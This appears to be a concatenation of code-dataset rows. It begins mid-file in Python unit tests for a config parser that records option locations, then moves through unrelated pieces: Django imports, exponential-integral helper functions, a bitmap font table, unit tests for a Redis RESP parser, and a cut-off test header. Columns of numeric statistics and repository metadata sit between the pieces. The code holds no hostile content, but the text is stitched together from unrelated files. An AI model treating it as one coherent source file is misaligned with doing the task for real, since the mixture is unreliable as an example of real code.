self.assertEqual(cfg.get_line('sectA', 'baz'), 2)
def test_explicit_location(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
cfg.set('foo', 'bar', 'A', location='preserve')
self.assertEqual(cfg.get('foo', 'bar'), 'A')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
loc = ("not_real.cfg", 1234)
cfg.set('foo', 'bar', 'B', location=loc)
self.assertEqual(cfg.get('foo', 'bar'), 'B')
self.assertEqual(cfg.get_location('foo', 'bar'), loc)
with self.assertRaises(ValueError):
cfg.set('foo', 'bar', 'C', location="a bad value")
self.assertEqual(cfg.get('foo', 'bar'), 'B')
self.assertEqual(cfg.get_location('foo', 'bar'), loc)
with self.assertRaises(configparser.NoSectionError):
cfg.set('not_here', 'bar', 'C')
cfg.set('foo', 'bar', 'D', location=None)
self.assertIsNone(cfg.get_location('foo', 'bar'))
def test_set_location(self):
cfg = configlines.ConfigParser()
cfg.add_section('foo')
cfg.set('foo', 'bar', 'A')
self.assertIsNone(cfg.get_location('foo', 'bar'))
cfg.set_location('foo', 'bar', ('a', 1))
self.assertEqual(cfg.get_location('foo', 'bar'), ('a', 1))
with self.assertRaises(ValueError):
cfg.set_location('foo', 'bar', 'a bad value')
self.assertEqual(cfg.get_location('foo', 'bar'), ('a', 1))
cfg.set_location('foo', 'bar', None)
self.assertIsNone(cfg.get_location('foo', 'bar'))
with self.assertRaises(configparser.NoSectionError):
cfg.set_location('not_here', 'bar', ('a', 1))
with self.assertRaises(configparser.NoOptionError):
cfg.set_location('foo', 'baz', ('a', 1))
def test_get_nonexistant(self):
cfg = configlines.ConfigParser()
cfg.add_section('foo')
with self.assertRaises(configparser.NoSectionError):
cfg.get_location('not_here', 'bar')
with self.assertRaises(configparser.NoOptionError):
cfg.get_location('foo', 'bar')
def test_remove_option(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
cfg.remove_option('foo', 'bar')
with self.assertRaises(configparser.NoOptionError):
cfg.get_location('foo', 'bar')
cfg.set('foo', 'bar', '1')
self.assertIsNone(cfg.get_location('foo', 'bar'))
self.assertEqual(cfg.get_location('foo', 'baz'), (path, 3))
cfg.remove_option('foo', 'baz')
cfg.set('foo', 'baz', '2', location='preserve')
self.assertIsNone(cfg.get_location('foo', 'baz'))
def test_remove_section(self):
cfg = configlines.ConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
cfg.remove_section('foo')
with self.assertRaises(configparser.NoSectionError):
cfg.get_location('foo', 'bar')
cfg.add_section('foo')
with self.assertRaises(configparser.NoOptionError):
cfg.get_location('foo', 'bar')
cfg.set('foo', 'bar', '1')
self.assertIsNone(cfg.get_location('foo', 'bar'))
cfg.set('foo', 'baz', '2', location='preserve')
self.assertIsNone(cfg.get_location('foo', 'baz'))
def test_xform(self):
class MyParser(configlines.ConfigParser):
def optionxform(self, option):
return option.upper()
cfg = MyParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
cfg.set('foo', 'bar', 'A', location='preserve')
self.assertEqual(cfg.get('foo', 'bar'), 'A')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
cfg.set_location('foo', 'bar', ('a', 1))
self.assertEqual(cfg.get_location('foo', 'bar'), ('a', 1))
loc = ("not_real.cfg", 1234)
cfg.set('foo', 'bar', 'B', location=loc)
self.assertEqual(cfg.get_location('foo', 'bar'), loc)
def test_custom_type(self):
# Something that isn't the default OrderedDict
class MyDict(dict):
pass
cfg = configlines.ConfigParser(dict_type=MyDict)
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_location('foo', 'BAR'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
self.assertEqual(cfg.get('foo', 'baz'), '2')
self.assertEqual(cfg.get_location('foo', 'baz'), (path, 3))
self.assertEqual(cfg.get_filename('foo', 'baz'), path)
self.assertEqual(cfg.get_line('foo', 'baz'), 3)
self.assertEqual(cfg.get('qwerty', 'abc'), 'a split\nline')
self.assertEqual(cfg.get_location('qwerty', 'abc'), (path, 11))
self.assertEqual(cfg.get_filename('qwerty', 'abc'), path)
self.assertEqual(cfg.get_line('qwerty', 'abc'), 11)
def test_simple_raw(self):
cfg = configlines.RawConfigParser()
path = resource_filename(__name__, 'data1.cfg')
cfg.read(path)
self.assertEqual(cfg.get('foo', 'bar'), '1')
self.assertEqual(cfg.get_location('foo', 'bar'), (path, 2))
self.assertEqual(cfg.get_location('foo', 'BAR'), (path, 2))
self.assertEqual(cfg.get_filename('foo', 'bar'), path)
self.assertEqual(cfg.get_line('foo', 'bar'), 2)
self.assertEqual(cfg.get('foo', 'baz'), '2')
self.assertEqual(cfg.get_location('foo', 'baz'), (path, 3))
self.assertEqual(cfg.get_filename('foo', 'baz'), path)
self.assertEqual(cfg.get_line('foo', 'baz'), 3)
self.assertEqual(cfg.get('qwerty', 'abc'), 'a split\nline')
self.assertEqual(cfg.get_location('qwerty', 'abc'), (path, 11))
self.assertEqual(cfg.get_filename('qwerty', 'abc'), path)
self.assertEqual(cfg.get_line('qwerty', 'abc'), 11)
def test_simple_safe(self):
    """SafeConfigParser records (file, line) locations for every option."""
    cfg = configlines.SafeConfigParser()
    path = resource_filename(__name__, 'data1.cfg')
    cfg.read(path)
    for section, option, value, line in (
            ('foo', 'bar', '1', 2),
            ('foo', 'baz', '2', 3),
            ('qwerty', 'abc', 'a split\nline', 11)):
        self.assertEqual(cfg.get(section, option), value)
        self.assertEqual(cfg.get_location(section, option), (path, line))
        self.assertEqual(cfg.get_filename(section, option), path)
        self.assertEqual(cfg.get_line(section, option), line)
    # Location lookup ignores option-name case.
    self.assertEqual(cfg.get_location('foo', 'BAR'), (path, 2))
| 41.149007
| 71
| 0.598455
| 1,524
| 12,427
| 4.744751
| 0.067585
| 0.110358
| 0.271332
| 0.316554
| 0.878993
| 0.856037
| 0.753699
| 0.709999
| 0.647075
| 0.631448
| 0
| 0.012786
| 0.213326
| 12,427
| 301
| 72
| 41.285714
| 0.726882
| 0.003541
| 0
| 0.645299
| 0
| 0
| 0.111793
| 0
| 0
| 0
| 0.000808
| 0
| 0.589744
| 1
| 0.059829
| false
| 0.004274
| 0.025641
| 0.004274
| 0.102564
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2e14029b05698a98078095dbfb57457b6cc2ce2e
| 142
|
py
|
Python
|
Home/forms.py
|
Piotr95/Yummy_Pies
|
a5101b41caa932a69a7c9eda59aef237cf6a69a8
|
[
"MIT"
] | null | null | null |
Home/forms.py
|
Piotr95/Yummy_Pies
|
a5101b41caa932a69a7c9eda59aef237cf6a69a8
|
[
"MIT"
] | null | null | null |
Home/forms.py
|
Piotr95/Yummy_Pies
|
a5101b41caa932a69a7c9eda59aef237cf6a69a8
|
[
"MIT"
] | null | null | null |
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
import datetime
| 20.285714
| 54
| 0.84507
| 20
| 142
| 6
| 0.5
| 0.25
| 0.283333
| 0.35
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 142
| 6
| 55
| 23.666667
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
2e84b206539a6313384618deb524872e21bc0563
| 787
|
py
|
Python
|
calculus.py
|
jordandll/XMath
|
27c355656f783ac68737e67ac56fd312b101073a
|
[
"MIT"
] | null | null | null |
calculus.py
|
jordandll/XMath
|
27c355656f783ac68737e67ac56fd312b101073a
|
[
"MIT"
] | null | null | null |
calculus.py
|
jordandll/XMath
|
27c355656f783ac68737e67ac56fd312b101073a
|
[
"MIT"
] | null | null | null |
def int_exp_sin(a, w):
    """Coefficients of the primitive integral of f(t) = C e^(at + b) sin(wt + p).

    C, b, and p are arbitrary constants.  The primitive integral,
    henceforth 'A_f', has the general form:

        A_f = C e^(at + b) (A sin(wt + p) + B cos(wt + p))

    Returns the pair (A, B) appearing in the identity above.
    """
    denominator = a ** 2 + w ** 2
    cos_coeff = -w / denominator          # B
    sin_coeff = (1 + w * cos_coeff) / a   # A
    return (sin_coeff, cos_coeff)
def int_exp_cos(a, w):
    """Coefficients of the primitive integral of f(t) = C e^(at + b) cos(wt + p).

    C, b, and p are arbitrary constants.  The primitive integral,
    henceforth 'A_f', has the general form:

        A_f = C e^(at + b) (A sin(wt + p) + B cos(wt + p))

    Returns the pair (A, B) appearing in the identity above.
    """
    sin_coeff = w / (a ** 2 + w ** 2)     # A
    cos_coeff = (1 - w * sin_coeff) / a   # B
    return (sin_coeff, cos_coeff)
| 31.48
| 108
| 0.576874
| 156
| 787
| 2.858974
| 0.25641
| 0.040359
| 0.040359
| 0.047085
| 0.869955
| 0.847534
| 0.847534
| 0.847534
| 0.847534
| 0.847534
| 0
| 0.010084
| 0.243964
| 787
| 24
| 109
| 32.791667
| 0.739496
| 0.766201
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cf59367e4f8c906270bbfcf8e9c5234e6e662dce
| 5,987
|
py
|
Python
|
fonts/ami-ega_8x14.py
|
ccccmagicboy/st7735_mpy
|
b15f1bde69fbe6e0eb4931c57e71c136d8e7f024
|
[
"MIT"
] | 6
|
2020-07-11T16:59:19.000Z
|
2021-07-16T19:32:49.000Z
|
ports/esp32/user_modules/st7735_mpy/fonts/ami-ega_8x14.py
|
d4niele/micropython
|
a1f7b37d392bf46b28045ce215ae899fda8d8c38
|
[
"MIT"
] | 1
|
2020-04-14T03:14:45.000Z
|
2020-04-14T03:14:45.000Z
|
fonts/ami-ega_8x14.py
|
ccccmagicboy/st7735_mpy
|
b15f1bde69fbe6e0eb4931c57e71c136d8e7f024
|
[
"MIT"
] | null | null | null |
"""converted from ..\fonts\ami-ega__8x14.bin """
WIDTH = 8
HEIGHT = 14
FIRST = 0x20
LAST = 0x7f
_FONT =\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x18\x18\x18\x18\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\xcc\xcc\xcc\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x36\x6c\x6c\xfe\x6c\xfe\x6c\x6c\xd8\x00\x00\x00'\
b'\x00\x18\x18\x7e\xc6\xc0\x7c\x06\xc6\xfc\x30\x30\x00\x00'\
b'\x00\x00\x00\xc2\xc6\x0c\x18\x30\x60\xc6\x86\x00\x00\x00'\
b'\x00\x00\x38\x6c\x6c\x38\x70\xde\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x18\x18\x18\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x18\x30\x60\x60\x60\x60\x60\x30\x18\x00\x00\x00'\
b'\x00\x00\x60\x30\x18\x18\x18\x18\x18\x30\x60\x00\x00\x00'\
b'\x00\x00\x00\x66\x66\x3c\xff\x3c\x66\x66\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x18\x18\x7e\x18\x18\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x30\x30\x30\x60\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x7e\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x30\x00\x00\x00'\
b'\x00\x00\x00\x02\x06\x0c\x18\x30\x60\xc0\x80\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xd6\xd6\xd6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x30\x70\xf0\x30\x30\x30\x30\x30\xfc\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x0c\x18\x30\x60\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x06\x1c\x06\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x0c\x1c\x3c\x6c\xcc\xfe\x0c\x0c\x0c\x00\x00\x00'\
b'\x00\x00\xfe\xc0\xc0\xfc\x06\x06\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x3c\x66\xc0\xc0\xfc\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xfe\xc6\xc6\x0c\x18\x30\x30\x30\x30\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7c\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7e\x06\x06\xcc\x78\x00\x00\x00'\
b'\x00\x00\x00\x30\x30\x00\x00\x00\x30\x30\x00\x00\x00\x00'\
b'\x00\x00\x00\x18\x18\x00\x00\x18\x18\x18\x30\x00\x00\x00'\
b'\x00\x00\x0c\x18\x30\x60\xc0\x60\x30\x18\x0c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xfe\x00\x00\xfe\x00\x00\x00\x00\x00'\
b'\x00\x00\xc0\x60\x30\x18\x0c\x18\x30\x60\xc0\x00\x00\x00'\
b'\x00\x00\x7c\xc6\x06\x0c\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xde\xde\xde\xc0\xc0\x7c\x00\x00\x00'\
b'\x00\x00\x38\x6c\xc6\xc6\xc6\xfe\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xfc\x6e\x66\x66\x7c\x66\x66\x6e\xfc\x00\x00\x00'\
b'\x00\x00\x3e\x62\xc0\xc0\xc0\xc0\xc0\x62\x3e\x00\x00\x00'\
b'\x00\x00\xf8\x6e\x66\x66\x66\x66\x66\x6e\xf8\x00\x00\x00'\
b'\x00\x00\xfe\x66\x60\x60\x78\x60\x60\x66\xfe\x00\x00\x00'\
b'\x00\x00\xfe\x66\x60\x60\x78\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x3e\x62\xc0\xc0\xc0\xde\xc6\x66\x3e\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xfe\xc6\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x78\x30\x30\x30\x30\x30\x30\x30\x78\x00\x00\x00'\
b'\x00\x00\x1e\x0c\x0c\x0c\x0c\x0c\x0c\xcc\x78\x00\x00\x00'\
b'\x00\x00\xe6\x66\x6c\x6c\x78\x78\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\xf0\x60\x60\x60\x60\x60\x60\x66\xfe\x00\x00\x00'\
b'\x00\x00\xc6\xee\xfe\xfe\xd6\xd6\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x86\xc6\xe6\xf6\xfe\xfe\xde\xce\xc6\x00\x00\x00'\
b'\x00\x00\x38\x7c\xc6\xc6\xc6\xc6\xc6\x7c\x38\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x60\x60\x60\xe0\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\xc6\xd6\xde\x7c\x0e\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x78\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc0\x60\x38\x0c\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xfc\xb4\x30\x30\x30\x30\x30\x30\x78\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\xc6\xc6\xfe\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\x7c\x38\x10\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xd6\xfe\xfe\xee\xc6\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\x6c\x38\x38\x6c\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xcc\xcc\xcc\xcc\x78\x30\x30\x30\x78\x00\x00\x00'\
b'\x00\x00\xfe\xc6\x0c\x18\x30\x60\xc0\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x78\x60\x60\x60\x60\x60\x60\x60\x78\x00\x00\x00'\
b'\x00\x00\x00\x80\xc0\x60\x30\x18\x0c\x06\x02\x00\x00\x00'\
b'\x00\x00\x78\x18\x18\x18\x18\x18\x18\x18\x78\x00\x00\x00'\
b'\x00\x10\x38\x6c\xc6\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00'\
b'\x00\x30\x30\x30\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x38\x0c\x7c\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\x60\x60\x60\x78\x6c\x66\x66\x66\xdc\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7e\xc2\xc0\xc0\xc2\x7e\x00\x00\x00'\
b'\x00\x00\x0c\x0c\x0c\x3c\x6c\xcc\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xfe\xc0\xc2\x7e\x00\x00\x00'\
b'\x00\x00\x3c\x66\x60\x60\xf8\x60\x60\x60\xe0\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x76\xcc\xcc\xcc\x7c\x0c\xcc\x7c\x00'\
b'\x00\x00\xe0\x60\x60\x78\x6c\x66\x66\x66\x66\x00\x00\x00'\
b'\x00\x00\x18\x18\x00\x38\x18\x18\x18\x18\x1c\x00\x00\x00'\
b'\x00\x00\x0c\x0c\x00\x1c\x0c\x0c\x0c\x0c\xcc\xcc\x78\x00'\
b'\x00\x00\xe0\x60\x60\x66\x6c\x78\x6c\x66\x66\x00\x00\x00'\
b'\x00\x00\x38\x18\x18\x18\x18\x18\x18\x18\x1c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xee\xfe\xd6\xd6\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xde\x66\x66\x66\x66\x66\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x66\x66\x7c\x60\x60\xe0\x00'\
b'\x00\x00\x00\x00\x00\x76\xcc\xcc\xcc\x7c\x0c\x0c\x0e\x00'\
b'\x00\x00\x00\x00\x00\xdc\x76\x60\x60\x60\x60\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc4\x70\x1c\x46\x7c\x00\x00\x00'\
b'\x00\x00\x10\x30\x30\x7c\x30\x30\x30\x36\x1c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xcc\xcc\xcc\xcc\xf6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xcc\xcc\xcc\x78\x30\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xd6\xfe\xfe\x6c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\x7c\x38\x38\x7c\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xcc\xcc\xcc\x7c\x0c\xcc\x7c\x00'\
b'\x00\x00\x00\x00\x00\xfe\x8c\x18\x30\x62\xfe\x00\x00\x00'\
b'\x00\x00\x1c\x30\x30\x30\xe0\x30\x30\x30\x1c\x00\x00\x00'\
b'\x00\x00\x30\x30\x30\x30\x00\x30\x30\x30\x30\x00\x00\x00'\
b'\x00\x00\xe0\x30\x30\x30\x1c\x30\x30\x30\xe0\x00\x00\x00'\
b'\x00\x00\x00\x76\xdc\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x10\x38\x6c\xc6\xc6\xc6\xfe\x00\x00\x00\x00'\
FONT = memoryview(_FONT)
| 57.019048
| 60
| 0.704192
| 1,459
| 5,987
| 2.886909
| 0.045922
| 0.591168
| 0.49359
| 0.316239
| 0.841643
| 0.761871
| 0.724359
| 0.631292
| 0.503324
| 0.40717
| 0
| 0.375192
| 0.019709
| 5,987
| 104
| 61
| 57.567308
| 0.342477
| 0.006514
| 0
| 0
| 0
| 0.941176
| 0.905203
| 0.905203
| 0
| 1
| 0.001347
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
d87b9ab43709962c2e411f2b68eb78fee32f5f19
| 4,581
|
py
|
Python
|
tests/ParserTest.py
|
nok/redis-resp
|
ec4e5180b83921a35b3408547de580804257873c
|
[
"MIT"
] | null | null | null |
tests/ParserTest.py
|
nok/redis-resp
|
ec4e5180b83921a35b3408547de580804257873c
|
[
"MIT"
] | null | null | null |
tests/ParserTest.py
|
nok/redis-resp
|
ec4e5180b83921a35b3408547de580804257873c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import subprocess
from unittest import TestCase
from resp.Parser import Parser
class ParserTest(TestCase):
    """Integration tests for ``resp.Parser``.

    The Parser writes a RESP protocol stream to stdout, so each output test
    runs it in a subprocess and compares the captured bytes against the
    expected RESP sequence.  The repeated subprocess plumbing and the truth
    literal (previously duplicated in five tests) are factored into
    ``_run_parser`` and ``TRUTH_SINGLE``.
    """

    # Expected RESP output of 'SET {0} {1}' over the four fixture rows
    # (1, a), (2, b), (3, c), (4, d).
    TRUTH_SINGLE = str('*3\r\n$3\r\nSET\r\n$1\r\n1\r\n$1\r\na\r\n'
                       '*3\r\n$3\r\nSET\r\n$1\r\n2\r\n$1\r\nb\r\n'
                       '*3\r\n$3\r\nSET\r\n$1\r\n3\r\n$1\r\nc\r\n'
                       '*3\r\n$3\r\nSET\r\n$1\r\n4\r\n$1\r\nd\r\n').encode('utf8')

    def setUp(self):
        super(ParserTest, self).setUp()
        # Fixture dumps live in tests/data next to this file.
        current_dir = os.path.dirname(os.path.realpath(__file__))
        self.data_dir = os.path.join(current_dir, 'data')

    def _run_parser(self, file_name, redis_cmd, extra_args=''):
        """Run Parser on a fixture file in a subprocess; return stdout bytes.

        ``extra_args`` is spliced verbatim into the Parser(...) call, e.g.
        ", delimeter=';'" (sic -- that is how the Parser API spells it).
        """
        file_ = os.path.join(self.data_dir, file_name)
        code = "from resp.Parser import Parser;" \
               "Parser(file_path='{}', redis='{}'{})".format(
                   file_, redis_cmd, extra_args)
        proc = subprocess.Popen(['python', '-c', code], stdout=subprocess.PIPE)
        return proc.communicate()[0]

    def test_invalid_file_path(self):
        # A nonexistent input file must be rejected at construction time.
        file_ = os.path.join(self.data_dir, 'noname.txt')
        self.assertRaises(AttributeError, Parser,
                          file_path=file_, redis='SET {0} {1}')

    def test_invalid_command(self):
        # An empty redis command template must be rejected.
        file_ = os.path.join(self.data_dir, 'dump_comma.txt')
        self.assertRaises(AttributeError, Parser,
                          file_path=file_, redis='')

    def test_output_with_comma_del(self):
        result = self._run_parser('dump_comma.txt', 'SET {0} {1}')
        self.assertEqual(result, self.TRUTH_SINGLE)

    def test_output_with_whitespace(self):
        result = self._run_parser('dump_with_whitespace.txt', 'SET {0} {1}')
        self.assertEqual(result, self.TRUTH_SINGLE)

    def test_output_with_semicolon_del(self):
        result = self._run_parser('dump_semicolon.txt', 'SET {0} {1}',
                                  extra_args=", delimeter=';'")
        self.assertEqual(result, self.TRUTH_SINGLE)

    def test_output_with_mult_cols(self):
        # {2} selects the third column of the multi-column dump, which
        # holds the same a..d values as the single-column fixtures.
        result = self._run_parser('dump_mult_cols.txt', 'SET {0} {2}')
        self.assertEqual(result, self.TRUTH_SINGLE)

    def test_output_with_mult_comds(self):
        # Two pipe-separated command templates emit interleaved SETs per
        # row; column {1} holds z, y, x, w.
        result = self._run_parser('dump_mult_cols.txt',
                                  'SET {0} {2} | SET {0} {1}')
        truth = str('*3\r\n$3\r\nSET\r\n$1\r\n1\r\n$1\r\na\r\n'
                    '*3\r\n$3\r\nSET\r\n$1\r\n1\r\n$1\r\nz\r\n'
                    '*3\r\n$3\r\nSET\r\n$1\r\n2\r\n$1\r\nb\r\n'
                    '*3\r\n$3\r\nSET\r\n$1\r\n2\r\n$1\r\ny\r\n'
                    '*3\r\n$3\r\nSET\r\n$1\r\n3\r\n$1\r\nc\r\n'
                    '*3\r\n$3\r\nSET\r\n$1\r\n3\r\n$1\r\nx\r\n'
                    '*3\r\n$3\r\nSET\r\n$1\r\n4\r\n$1\r\nd\r\n'
                    '*3\r\n$3\r\nSET\r\n$1\r\n4\r\n$1\r\nw\r\n').encode('utf8')
        self.assertEqual(result, truth)
| 47.71875
| 79
| 0.534599
| 820
| 4,581
| 2.891463
| 0.10122
| 0.080978
| 0.060734
| 0.080978
| 0.850696
| 0.83973
| 0.83973
| 0.83973
| 0.811472
| 0.751582
| 0
| 0.042286
| 0.251473
| 4,581
| 95
| 80
| 48.221053
| 0.649169
| 0.009168
| 0
| 0.634146
| 0
| 0.292683
| 0.349129
| 0.246418
| 0
| 0
| 0
| 0
| 0.085366
| 1
| 0.097561
| false
| 0
| 0.109756
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b26b5956613b962554ab6447760a9497fa7e2f6
| 155
|
py
|
Python
|
umigame/datasets/__init__.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | null | null | null |
umigame/datasets/__init__.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | null | null | null |
umigame/datasets/__init__.py
|
penguinwang96825/Umigame
|
98d647ab6f40df08fe31d6b3bc444afe229a914e
|
[
"Apache-2.0"
] | 1
|
2021-11-01T14:35:32.000Z
|
2021-11-01T14:35:32.000Z
|
from .crypto import fetch_crypto
from .stock import fetch_usstock
from .text import fetch_twitter
from .text import fetch_news
from .text import fetch_text
| 31
| 32
| 0.845161
| 25
| 155
| 5.04
| 0.36
| 0.436508
| 0.333333
| 0.452381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122581
| 155
| 5
| 33
| 31
| 0.926471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
993e737510b66ecb431a3a6f8e97c350e64978c7
| 3,708
|
py
|
Python
|
AutomationFramework/tests/hardware/test_hw_cpu.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 1
|
2020-04-23T15:22:16.000Z
|
2020-04-23T15:22:16.000Z
|
AutomationFramework/tests/hardware/test_hw_cpu.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 44
|
2020-08-13T19:35:41.000Z
|
2021-03-01T09:08:00.000Z
|
AutomationFramework/tests/hardware/test_hw_cpu.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 6
|
2020-04-23T15:29:38.000Z
|
2022-03-03T14:23:38.000Z
|
import pytest
from AutomationFramework.page_objects.hardware.hardware import Hardware
from AutomationFramework.tests.base_test import BaseTest
